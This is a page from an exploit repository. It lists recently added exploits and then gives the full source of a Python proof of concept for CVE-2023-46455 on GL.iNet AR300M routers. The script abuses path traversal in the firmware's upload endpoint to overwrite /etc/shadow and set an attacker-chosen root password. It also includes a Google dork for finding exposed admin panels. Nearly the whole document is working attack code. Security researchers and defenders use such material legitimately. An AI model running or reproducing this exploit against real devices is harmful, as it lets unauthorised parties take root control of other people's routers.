7ef8e488d8
22 changes to exploits/shellcodes/ghdb GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated) R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution TPC-110W - Missing Authentication for Critical Function A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc Easywall 0.3.1 - Authenticated Remote Command Execution Magento ver. 2.4.6 - XSLT Server Side Injection AC Repair and Services System v1.0 - Multiple SQL Injection Enrollment System v1.0 - SQL Injection Petrol Pump Management Software v.1.0 - SQL Injection Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload Real Estate Management System v1.0 - Remote Code Execution via File Upload Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection Simple Student Attendance System v1.0 - Time Based Blind SQL Injection Boss Mini 1.4.0 - local file inclusion Windows PowerShell - Event Log Bypass Single Quote Code Execution
61 lines
No EOL
2 KiB
Python
Executable file
61 lines
No EOL
2 KiB
Python
Executable file
#!/usr/bin/env python3
|
|
|
|
# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write
|
|
# Google Dork: intitle:"GL.iNet Admin Panel"
|
|
# Date: XX/11/2023
|
|
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
|
|
# Vendor Homepage: https://www.gli-net.com
|
|
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
|
|
# Version: 4.3.7
|
|
# Tested on: GL.iNet AR300M
|
|
# CVE: CVE-2023-46455
|
|
|
|
import crypt
|
|
import requests
|
|
from sys import argv
|
|
|
|
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
def craft_shadow_file(salted_password):
|
|
shadow_content = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)
|
|
shadow_content += 'daemon:*:0:0:99999:7:::\n'
|
|
shadow_content += 'ftp:*:0:0:99999:7:::\n'
|
|
shadow_content += 'network:*:0:0:99999:7:::\n'
|
|
shadow_content += 'nobody:*:0:0:99999:7:::\n'
|
|
shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'
|
|
shadow_content += 'stubby:x:0:0:99999:7:::\n'
|
|
shadow_content += 'ntp:x:0:0:99999:7::\n'
|
|
shadow_content += 'mosquitto:x:0:0:99999:7::\n'
|
|
shadow_content += 'logd:x:0:0:99999:7::\n'
|
|
shadow_content += 'ubus:x:0:0:99999:7::\n'
|
|
return shadow_content
|
|
|
|
def replace_shadow_file(url, auth_token, shadow_content):
|
|
data = {
|
|
'sid': (None, auth_token),
|
|
'size': (None, '4'),
|
|
'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),
|
|
'file': ('shadow', shadow_content)
|
|
}
|
|
requests.post(url, files=data, verify=False)
|
|
|
|
def main(base_url, auth_token):
|
|
print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')
|
|
|
|
password = input('[?] New password for root user: ')
|
|
salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)
|
|
|
|
shadow_content = craft_shadow_file(salted_password)
|
|
print('[+] Crafted shadow file:\n{}'.format(shadow_content))
|
|
|
|
print('[*] Replacing shadow file with the crafted one')
|
|
replace_shadow_file(base_url+'/upload', auth_token, shadow_content)
|
|
|
|
print('[+] Done')
|
|
|
|
if __name__ == '__main__':
|
|
if len(argv) < 3:
|
|
print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))
|
|
exit(1)
|
|
|
|
main(argv[1], argv[2]) |